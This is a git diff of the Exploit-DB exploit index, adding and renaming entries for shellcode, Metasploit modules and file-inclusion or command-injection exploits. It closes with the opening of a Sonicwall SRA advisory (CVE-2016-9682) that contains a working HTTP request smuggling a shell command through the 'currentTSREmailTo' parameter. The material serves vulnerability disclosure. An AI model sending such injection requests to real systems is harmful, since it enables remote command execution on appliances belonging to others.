38632,platforms/hardware/remote/38632.txt,"Multiple Zoom Telephonics Devices - Multiple Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote,0
38627,platforms/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0
38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0
@@ -15380,7 +15364,6 @@ id,file,description,date,author,platform,type,port
38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock) (Metasploit)",2015-12-02,Metasploit,cgi,remote,0
38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote,0
38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router - Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0
-38853,platforms/hardware/remote/38853.sh,"Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,remote,0
38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation() (Metasploit)",2015-12-03,Metasploit,windows,remote,7777
38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 - voice-servlet prepareAudioToPlay() Arbitrary File Upload (Metasploit)",2015-12-03,Metasploit,windows,remote,7777
38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 - Remote Code Execution (Metasploit)",2015-12-08,Metasploit,php,remote,80
@@ -16345,6 +16328,7 @@ id,file,description,date,author,platform,type,port
42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0
42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0
+42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -17840,7 +17824,7 @@ id,file,description,date,author,platform,type,port
3323,platforms/php/webapps/3323.htm,"VS-Link-Partner 2.1 - (script_pfad) Remote File Inclusion",2007-02-16,ajann,php,webapps,0
3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - (ht_pfad) Remote File Inclusion",2007-02-16,kezzap66345,php,webapps,0
3325,platforms/php/webapps/3325.pl,"webSPELL 4.01.02 - (showonly) Blind SQL Injection",2007-02-16,DNX,php,webapps,0
-3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - (root) Local File Inclusion",2007-02-16,Snip0r,php,webapps,0
+3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - 'root' Local File Inclusion",2007-02-16,Snip0r,php,webapps,0
3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - (album) SQL Injection",2007-02-17,Bl0od3r,php,webapps,0
3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - (gb_pfad) Remote File Inclusion",2007-02-18,ajann,php,webapps,0
3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - 'archives.php' Remote File Disclosure",2007-02-18,r0ut3r,php,webapps,0
@@ -23477,7 +23461,7 @@ id,file,description,date,author,platform,type,port
12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps,0
12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0
12246,platforms/php/webapps/12246.txt,"Joomla! Component Intellectual Property 1.5.3 - 'id' Parameter SQL Injection",2010-04-15,v3n0m,php,webapps,0
-12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0
+12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - 'DOCUMENT_ROOT' Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,php,webapps,0
12254,platforms/php/webapps/12254.txt,"FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0
12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0
@@ -24339,6 +24323,7 @@ id,file,description,date,author,platform,type,port
14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Inclusion",2010-08-03,eidelweiss,php,webapps,0
14558,platforms/php/webapps/14558.txt,"sX-Shop - Multiple SQL Injections",2010-08-05,CoBRa_21,php,webapps,0
14541,platforms/php/webapps/14541.txt,"WordPress Plugin NextGEN Smooth Gallery 0.12 - Blind SQL Injection",2010-08-03,kaMtiEz,php,webapps,0
+14547,platforms/windows/webapps/14547.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'OvJavaLocale' Buffer Overflow",2010-08-03,"Nahuel Riva",windows,webapps,0
14557,platforms/php/webapps/14557.txt,"sX-Shop - 'view_image.php' SQL Injection",2010-08-05,secret,php,webapps,0
14556,platforms/php/webapps/14556.txt,"Nuked-klaN Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps,0
14559,platforms/php/webapps/14559.txt,"APBoard 2.1.0 - 'board.php?id=' SQL Injection",2010-08-05,secret,php,webapps,0
@@ -24397,6 +24382,7 @@ id,file,description,date,author,platform,type,port
14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 - 'article.php' SQL Injection",2010-08-28,[]0iZy5,php,webapps,0
14737,platforms/php/webapps/14737.txt,"Simple Forum PHP - Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0
14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0
+14818,platforms/linux/webapps/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution",2010-08-27,"Nikolas Sotiriu",linux,webapps,0
14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0
14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",php,webapps,0
14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant - Remote File Inclusion",2010-08-26,LoSt.HaCkEr,php,webapps,0
@@ -25846,6 +25832,7 @@ id,file,description,date,author,platform,type,port
18632,platforms/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",php,webapps,0
18626,platforms/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Unauthenticated Directory Traversal",2012-03-19,rgod,jsp,webapps,0
18631,platforms/php/webapps/18631.txt,"OneForum - 'topic.php' SQL Injection",2012-03-20,"Red Security TEAM",php,webapps,0
+18932,platforms/linux/webapps/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution",2012-05-26,muts,linux,webapps,0
18638,platforms/hardware/webapps/18638.txt,"D-Link DIR-605 - Cross-Site Request Forgery",2012-03-21,iqzer0,hardware,webapps,0
18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 - SQL Injection / Cross-Site Scripting",2012-03-21,LiquidWorm,php,webapps,0
18644,platforms/php/webapps/18644.txt,"vBShout - Persistent Cross-Site Scripting",2012-03-22,ToiL,php,webapps,0
@@ -26098,6 +26085,7 @@ id,file,description,date,author,platform,type,port
20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0
20062,platforms/php/webapps/20062.py,"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0
20063,platforms/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection",2012-07-23,dookie,windows,webapps,0
+20064,platforms/linux/webapps/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution",2012-07-24,muts,linux,webapps,0
20083,platforms/php/webapps/20083.txt,"WordPress Plugin Front End Upload 0.5.4.4 - Arbitrary '.PHP' File Upload",2012-07-24,"Chris Kellum",php,webapps,0
20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps,0
20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,php,webapps,0
@@ -27213,6 +27201,7 @@ id,file,description,date,author,platform,type,port
23869,platforms/php/webapps/23869.txt,"PHP-Nuke MS-Analysis Module - Multiple Cross-Site Scripting Vulnerabilities",2004-03-22,"Janek Vind",php,webapps,0
23870,platforms/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module - HTTP Referrer Field SQL Injection",2004-03-22,"Janek Vind",php,webapps,0
23872,platforms/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal",2004-03-22,snifer,jsp,webapps,0
+23875,platforms/windows/webapps/23875.txt,"Trend Micro Interscan VirusWall localweb - Directory Traversal",2004-03-24,"Tri Huynh",windows,webapps,0
23885,platforms/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x - showgallery.php Multiple Parameter SQL Injection",2004-03-29,JeiAr,php,webapps,0
23886,platforms/windows/webapps/23886.txt,"Simple Web Server 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0
23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0
@@ -28472,6 +28461,7 @@ id,file,description,date,author,platform,type,port
26295,platforms/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,php,webapps,0
26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps,0
26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0
+26012,platforms/windows/webapps/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,webapps,80
26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 - Processform.php3 Name Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 - Processform.php3 Failed Cross-Site Scripting",2005-07-19,rgod,php,webapps,0
26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - 'auth.php' SQL Injection",2005-07-20,GHC,php,webapps,0
@@ -29499,6 +29489,7 @@ id,file,description,date,author,platform,type,port
27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 - 'cat.php' Multiple Parameter SQL Injections",2006-02-25,Linux_Drox,php,webapps,0
27315,platforms/php/webapps/27315.txt,"RiteCMS 1.0.0 - Multiple Vulnerabilities",2013-08-03,"Yashar shahinzadeh",php,webapps,0
27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 - Mainfile.php SQL Injection",2006-02-25,waraxe,php,webapps,0
+27320,platforms/hardware/webapps/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting",2006-02-25,"Preben Nylokken",hardware,webapps,0
27321,platforms/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection",2006-02-27,SAUDI,php,webapps,0
27322,platforms/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_index.php 'Username' Parameter Cross-Site Scripting",2006-02-27,botan,php,webapps,0
27323,platforms/php/webapps/27323.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_onfly.php Cross-Site Scripting",2006-02-27,botan,php,webapps,0
@@ -31465,8 +31456,8 @@ id,file,description,date,author,platform,type,port
30002,platforms/php/webapps/30002.txt,"WordPress Plugin Formcraft - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0
30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - implementation/Management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - implementation/Management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
-30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
-30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
+30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php' 'g_documentRoot' Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
+30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php' 'g_documentRoot' Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php' 'password0 Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php' 'language' Parameter SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Command Execution",2013-12-06,0_o,hardware,webapps,0
@@ -31646,6 +31637,7 @@ id,file,description,date,author,platform,type,port
30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 - datei.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
+30472,platforms/linux/webapps/30472.rb,"Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,webapps,7071
30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80
30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80
30478,platforms/php/webapps/30478.txt,"PHP MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,cr4wl3r,php,webapps,80
@@ -33261,6 +33253,7 @@ id,file,description,date,author,platform,type,port
33090,platforms/hardware/webapps/33090.txt,"TRENDnet TEW-634GRU 1.00.23 - Multiple Vulnerabilities",2014-04-29,SirGod,hardware,webapps,69
33091,platforms/php/webapps/33091.txt,"NULL NUKE CMS 2.2 - Multiple Vulnerabilities",2014-04-29,LiquidWorm,php,webapps,80
33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 - Information Disclosure",2009-11-06,"Daniel King",jsp,webapps,0
+33578,platforms/multiple/webapps/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,multiple,webapps,0
33097,platforms/php/webapps/33097.txt,"Programs Rating - rate.php id Parameter Cross-Site Scripting",2009-06-20,Moudi,php,webapps,0
33098,platforms/php/webapps/33098.txt,"Programs Rating - postcomments.php id Parameter Cross-Site Scripting",2009-06-20,Moudi,php,webapps,0
33102,platforms/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 - Web Mail URI Parsing HTML Injection",2009-06-23,"Andrea Purificato",php,webapps,0
@@ -33594,6 +33587,7 @@ id,file,description,date,author,platform,type,port
33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE / Cross-Site Scripting Injection",2014-06-13,"BLacK ZeRo",aix,webapps,0
33760,platforms/multiple/webapps/33760.txt,"Multiple Products - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,multiple,webapps,0
33761,platforms/asp/webapps/33761.txt,"Pars CMS - 'RP' Parameter Multiple SQL Injections",2010-03-15,Isfahan,asp,webapps,0
+33740,platforms/hardware/webapps/33740.txt,"Yealink VoIP Phone SIP-T38G - Local File Inclusion",2014-06-13,Mr.Un1k0d3r,hardware,webapps,0
33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - 'zero_transact_user.php' Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0
33759,platforms/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,multiple,webapps,0
33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0
@@ -34622,6 +34616,7 @@ id,file,description,date,author,platform,type,port
35407,platforms/php/webapps/35407.txt,"phpWebSite 1.7.1 - 'local' Parameter Cross-Site Scripting",2011-03-03,"AutoSec Tools",php,webapps,0
35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
+35410,platforms/windows/webapps/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion",2011-03-04,"AutoSec Tools",windows,webapps,0
35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 - Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0
35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 - Pages/login.aspx Language Parameter Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0
35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0
@@ -34725,6 +34720,7 @@ id,file,description,date,author,platform,type,port
35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
+35588,platforms/php/webapps/35588.rb,"Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,webapps,9000
35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - 'browse.php' 'category' Parameter SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80
35593,platforms/windows/webapps/35593.txt,"SysAid Server - Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0
35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443
@@ -35158,6 +35154,7 @@ id,file,description,date,author,platform,type,port
36280,platforms/php/webapps/36280.txt,"Symphony 2.2.3 - symphony/publish/images filter Parameter Cross-Site Scripting",2011-11-01,"Mesut Timur",php,webapps,0
36281,platforms/php/webapps/36281.txt,"Symphony 2.2.3 - symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0
36284,platforms/asp/webapps/36284.txt,"CmyDocument - Multiple Cross-Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0
+36286,platforms/hardware/webapps/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,webapps,0
36287,platforms/php/webapps/36287.txt,"WordPress Theme Bonus 1.0 - 's' Parameter Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0
36289,platforms/php/webapps/36289.txt,"SmartJobBoard - 'keywords' Parameter Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0
36290,platforms/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,php,webapps,0
@@ -35540,6 +35537,7 @@ id,file,description,date,author,platform,type,port
36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466
36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80
36863,platforms/php/webapps/36863.txt,"Joomla! Component Machine - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0
+36865,platforms/hardware/webapps/36865.txt,"Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,webapps,0
36867,platforms/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps,0
36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0
36873,platforms/php/webapps/36873.txt,"Dolibarr 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0
@@ -36227,6 +36225,7 @@ id,file,description,date,author,platform,type,port
37977,platforms/xml/webapps/37977.py,"Magento eCommerce - Remote Code Execution",2015-08-26,"Manish Tanwar",xml,webapps,0
37978,platforms/php/webapps/37978.txt,"Gramophone - 'rs' Parameter Cross-Site Scripting",2012-10-25,G13,php,webapps,0
37979,platforms/php/webapps/37979.txt,"VicBlog - Multiple SQL Injections",2012-10-26,Geek,php,webapps,0
+37982,platforms/hardware/webapps/37982.pl,"TP-Link TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",hardware,webapps,0
37983,platforms/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0
37989,platforms/php/webapps/37989.txt,"IP.Board 4.x - Persistent Cross-Site Scripting",2015-08-27,snop,php,webapps,0
37991,platforms/php/webapps/37991.txt,"WANem - Multiple Cross-Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",php,webapps,0
@@ -36553,6 +36552,7 @@ id,file,description,date,author,platform,type,port
38596,platforms/php/webapps/38596.txt,"Xaraya - Multiple Cross-Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0
38598,platforms/php/webapps/38598.txt,"ZamFoo - 'date' Parameter Remote Command Injection",2013-06-15,localhost.re,php,webapps,0
38602,platforms/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,windows,webapps,0
+38604,platforms/hardware/webapps/38604.txt,"Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,webapps,0
38605,platforms/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0
38606,platforms/php/webapps/38606.txt,"WordPress Plugin WP Private Messages - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0
38607,platforms/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0
@@ -36667,6 +36667,7 @@ id,file,description,date,author,platform,type,port
38844,platforms/php/webapps/38844.html,"WordPress Plugin Blue Wrench Video Widget - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0
38848,platforms/php/webapps/38848.php,"WordPress Theme Suco - 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps,0
38852,platforms/php/webapps/38852.pl,"PHPThumb - 'PHPThumb.php' Arbitrary File Upload",2013-12-01,DevilScreaM,php,webapps,0
+38853,platforms/hardware/webapps/38853.sh,"Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,webapps,0
38855,platforms/php/webapps/38855.txt,"WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection",2015-12-03,"Panagiotis Vagenas",php,webapps,0
38856,platforms/php/webapps/38856.txt,"WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",php,webapps,0
38861,platforms/php/webapps/38861.txt,"WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0
@@ -38146,5 +38147,10 @@ id,file,description,date,author,platform,type,port
42326,platforms/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps,0
42330,platforms/php/webapps/42330.txt,"Orangescrum 1.6.1 - Multiple Vulnerabilities",2017-07-16,tomplixsee,php,webapps,0
42332,platforms/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,json,webapps,0
-42333,platforms/hardware/webapps/42333.rb,"Barracuda Load Balancer Firmware <= 6.0.1.006 - Remote Command Injection (Metasploit)",2017-07-18,xort,hardware,webapps,0
+42333,platforms/hardware/webapps/42333.rb,"Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)",2017-07-18,xort,hardware,webapps,0
42335,platforms/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",multiple,webapps,0
+42342,platforms/cgi/webapps/42342.txt,"Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection",2017-07-19,xort,cgi,webapps,0
+42343,platforms/cgi/webapps/42343.rb,"Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
+42345,platforms/cgi/webapps/42345.rb,"Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
+42344,platforms/cgi/webapps/42344.rb,"Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
+42346,platforms/cgi/webapps/42346.txt,"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection",2017-07-19,xort,cgi,webapps,0
diff --git a/platforms/cgi/webapps/42342.txt b/platforms/cgi/webapps/42342.txt
new file mode 100755
index 000000000..32aaab107
--- /dev/null
+++ b/platforms/cgi/webapps/42342.txt
@@ -0,0 +1,60 @@
+Sonicwall Secure Remote Access (SRA) - Command Injection Vulnerabilities
+
+ Vendor: Sonicwall (Dell)
+ Product: Secure Remote Access (SRA)
+ Version: 8.1.0.2-14sv
+ Platform: Embedded Linux
+Discovery: Russell Sanford of Critical Start (www.CriticalStart.com)
+ CVE: cve-2016-9682
+
+
+Tested against version 8.1.0.2-14sv on 11/28/16 (fully updated)
+
+
+Description:
+The Sonicwall Secure Remote Access server (ver 8.1.0.2-14sv) is vulnerable to two Remote Command Injection vulnerabilities in it's
+web administrative interface. These vulnerabilies occur in the diagnostics CGI (/cgi-bin/diagnostics) component responsible for
+emailing out information about the state of the system. The application doesn't properly escape the information passed in the 'tsrDeleteRestartedFile'
+or 'currentTSREmailTo' variables before making a call to system() allowing for remote command injection.
+
+Exploitation of this vulnerability yeilds shell access to the remote machine under the useraccount 'nobody'
+
+
+Impact:
+Remote Code Execution
+
+
+Exploit #1 -----------------------------------------------------------------
+
+GET /cgi-bin/diagnostics?tsrEmailCurrent=true¤tTSREmailTo=|date>/tmp/xort||a%20%23 HTTP/1.1
+Host: 192.168.84.155
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Referer: https://192.168.84.155/cgi-bin/diagnostics
